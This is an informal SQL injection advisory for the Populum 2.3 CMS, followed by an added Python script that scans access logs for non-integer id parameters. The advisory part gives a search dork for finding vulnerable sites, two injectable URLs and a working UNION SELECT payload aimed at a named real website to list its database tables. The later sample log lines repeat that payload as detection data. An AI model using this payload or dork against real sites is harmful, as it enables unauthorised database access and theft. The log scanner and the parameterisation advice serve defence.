Populum version 2.3 suffers from a remote SQL injection vulnerability.
::::::::::::::ProUd to Be InDiaN::::::::::::::
~AuthoR : -[SiLeNtp0is0n]-
~Vuln. App : Populum version 2.3
~App Detail : Content management software for hybrid blog/media/commerce communities
~VuLneraBiLity : SQL injection
~DoRk : "Powered by Populum"
~My HoMe : www.andhrahackers.com
~gReetZ : Mr.XXXX ShRushe tRif0Rce h3LLb0y bRonRiC
~SpL gReetZ : TeamICW
:::::::::::::::::::::::::::::::::::::::::::::::
Vulnerable :
127.0.0.1/populum/diarypage.php?did=[SQL injection]
127.0.0.1/populum/link.php?id=[SQL injection]
:::::::::::::::::::::::::::::::::::::::::::::::
Live Demo :
http://www.opednews.com/populum/diarypage.php?did=15458+and+1=2+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.tables where table_schema=database()--
:::::::::::::::::::::::::::::::::::::::::::::::
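
A defender-side check for the two parameters listed above, as an added example that is not part of the original advisory: it scans web access log lines for `did` on diarypage.php and `id` on link.php and reports values that are not plain integers. The combined log format, the sample log lines and the assumption that both parameters are numeric ids are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script name -> id parameter, as listed in the advisory.
WATCHED = {"diarypage.php": "did", "link.php": "id"}

# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2010:10:00:00 +0000] '
    '"GET /populum/diarypage.php?did=15458 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2010:10:00:05 +0000] '
    '"GET /populum/diarypage.php?did=15458+and+1=2+union+select+1,2,3 HTTP/1.1" 200 812',
    '203.0.113.9 - - [01/Jan/2010:10:00:09 +0000] '
    '"GET /populum/link.php?id=7%27 HTTP/1.1" 500 0',
    '203.0.113.4 - - [01/Jan/2010:10:00:11 +0000] '
    '"GET /populum/index.php?id=abc HTTP/1.1" 200 900',
]


def suspicious_ids(log_lines):
    """Return (line_no, script, decoded_value) for watched id parameters
    whose value is not a plain integer. Only query-string values are
    visible in an access log; POST bodies are not covered."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        script = url.path.rsplit("/", 1)[-1].lower()
        param = WATCHED.get(script)
        if param is None:
            continue
        # parse_qs decodes %xx and '+'; keep_blank_values also reports "did=".
        values = parse_qs(url.query, keep_blank_values=True).get(param, [])
        for value in values:
            if not re.fullmatch(r"\d{1,10}", value):
                hits.append((line_no, script, value))
    return hits


if __name__ == "__main__":
    for line_no, script, value in suspicious_ids(SAMPLE_LOG):
        print(f"line {line_no}: {script} received non-integer id {value!r}")
```

The same integer-only rule belongs in the application itself: cast or validate `did` and `id` before they reach a query, and bind them as parameters rather than concatenating them into SQL.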